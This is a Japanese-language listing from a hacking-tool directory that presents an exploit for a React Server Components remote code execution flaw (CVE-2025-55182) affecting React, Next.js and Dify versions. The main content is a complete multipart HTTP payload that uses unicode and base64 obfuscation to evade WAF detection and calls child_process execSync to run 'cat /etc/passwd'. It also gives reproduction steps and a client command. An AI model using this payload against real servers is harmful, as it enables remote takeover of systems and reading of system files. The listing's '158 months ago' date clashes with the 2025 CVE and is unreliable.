Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-React-RCE — [脆弱性再現] 世界初のRSC機能に基づきWAF検出をバイパスできるCVE-2025-55182 React Server RCE 脆弱性 EXP。 | Kitploit
ツール/GitHubGitHub/xcanwin/cve-2025-55182-react-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用WAFバイパスペネトレーションテストペイロード開発
GitHubxcanwin/cve-2025-55182-react-rce

CVE-2025-55182-React-RCE

[脆弱性再現] 世界初のRSC機能に基づきWAF検出をバイパスできるCVE-2025-55182 React Server RCE 脆弱性 EXP。

リポジトリを見る
158ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182-React-RCE

プロジェクト概要と原理

  • RSC機能を活用してWAF検出をバイパスできる世界初のCVE-2025-55182 React Server RCEエクスプロイト。
  • RSC特有の機能を利用してWAFをバイパスする、世界初のCVE‑2025‑55182 React Server RCEエクスプロイト。
  • React Serverのデフォルト環境でのRCEを実現。
  • WAF回避シナリオに対応したオリジナルのEXPを新たに追加。原理: getOutlinedModel において、ブロックをまたいでJSONを段階的に参照可能。
  • 最小限にまで絞り込んだ再現環境を提供。

EXPの利点

  • __proto__:then、constructor:constructor 不要でRCE可能。
  • WAFが頻繁に遮断するキーワード "then": $1:__proto__:then、"get": $1:constructor:constructor、require('child_process') が出現しない。
  • 1つのEXPがデフォルト設定のネイティブReact Server、Next.js、Dify環境で動作。

再現環境の利点

  • 極限までシンプル。
  • 素早く構築可能。

脆弱性概要

情報内容
脆弱性名React Server RCE
脆弱性番号CVE-2025-55182
リスクレベル高
脆弱性タイプRCE
攻撃難易度低

影響を受けるバージョン

  • React 影響バージョン == 19.0.0
  • React 影響バージョン == 19.0.1
  • React 影響バージョン == 19.1.0
  • React 影響バージョン == 19.2.0
  • react-server-dom-webpackパッケージ 影響バージョン == 19.0.0、19.0.1、19.1.0、19.1.1、19.2.0
  • react-server-dom-parcelパッケージ 影響バージョン == 19.0.0、19.0.1、19.1.0、19.1.1、19.2.0
  • react-server-dom-turbopackパッケージ 影響バージョン == 19.0.0、19.0.1、19.1.0、19.1.1、19.2.0
  • Next.js 影響バージョン >= 14.3.0-canary.77
  • Next.js 15.0.0 <= 影響バージョン < 15.0.5
  • Next.js 15.1.0 <= 影響バージョン < 15.1.9
  • Next.js 15.2.0 <= 影響バージョン < 15.2.6
  • Next.js 15.3.0 <= 影響バージョン < 15.3.6
  • Next.js 15.4.0 <= 影響バージョン < 15.4.8
  • Next.js 15.5.0 <= 影響バージョン < 15.5.7
  • Next.js 16.0.0 <= 影響バージョン < 16.0.7
  • Dify 1.1.2 <= 影響バージョン < 1.10.1-fix.1

EXP 1

WAF回避シナリオ + デフォルトシナリオで使用可能:

root@kitploit:~
POST / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: test
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Length: 1445

------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="0"

"$@1"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="1"

{
    "\u0074\u0068\u0065\u006e": "$2:et",
    "status": "$2:es",
    "reason": "",
    "value": "$2:ev",
    "_response": "$2:er"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="2"

{
    "et": "$3",
    "es": "$4",
    "ev": "{\"\u0074\u0068\u0065\u006e\":\"\u0024\u0042\"}",
    "er": {
        "_prefix": "$2:ep",
        "_formData": "$2:ef"
    },
    "ep": "$5",
    "ef": {
        "get": "$2:eg"
    },
    "eg": "$6"
}
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="3"

"$0:\u0074\u0068\u0065\u006e"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="4"

"\u0072\u0065\u0073\u006f\u006c\u0076\u0065\u0064\u005f\u006d\u006f\u0064\u0065\u006c"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="5"

"x='Y2F0IC9ldGMvcGFzc3dk';d=u=>Buffer.from(u,'bas'+'e64')+'';y=global[d('cHJvY2Vzcw==')][d('bWFpbk1vZHVsZQ==')][d('cmVxdWlyZQ==')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/HEAD/d(%27Y2hpbGRfcHJvY2Vzcw==%27))[d('ZXhlY1N5bmM=')](https://github.com/xcanwin/cve-2025-55182-react-rce/blob/HEAD/d(x))+'';throw Object.assign(new Error(y),{digest:y});"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad
Content-Disposition: form-data; name="6"

"$0:toString:\u0063\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072"
------WebKitFormBoundaryx8jxCaNwiNWP3Sad--

再現 1

  1. サーバー環境:
root@kitploit:~
react-server-dom-webpack 19.2.0
  1. サーバーに react-server-dom-webpack の依存関係をダウンロードしてインストール:
root@kitploit:~
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npm install
npm run dev -- --hostname 127.0.0.1 --port 3000

サーバーが正常に起動: http://127.0.0.1:3000/

  1. クライアントでEXPを使用
root@kitploit:~
python3 -m venv .venv
. ./.venv/bin/activate
pip3 install requests
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"

再現 2

  1. サーバー環境:
root@kitploit:~
Next.js 16.0.6
実質的にはreact-server-dom-webpack 19.2.0に対応
  1. サーバーに Next.js の依存関係をダウンロードしてインストール:
root@kitploit:~
git clone https://github.com/xcanwin/CVE-2025-55182-React-RCE
cd CVE-2025-55182-React-RCE
npx [email protected] nextapp --yes --js --no-tailwind --no-eslint --empty
cd nextapp
npm run dev -- --hostname 127.0.0.1 --port 3000

サーバーが正常に起動: http://127.0.0.1:3000/

  1. クライアントでEXPを使用(上記と同じ)
root@kitploit:~
python3 CVE-2025-55182-React-RCE.py --url http://127.0.0.1:3000/ --exp "cat /etc/passwd"
ツールをダウンロード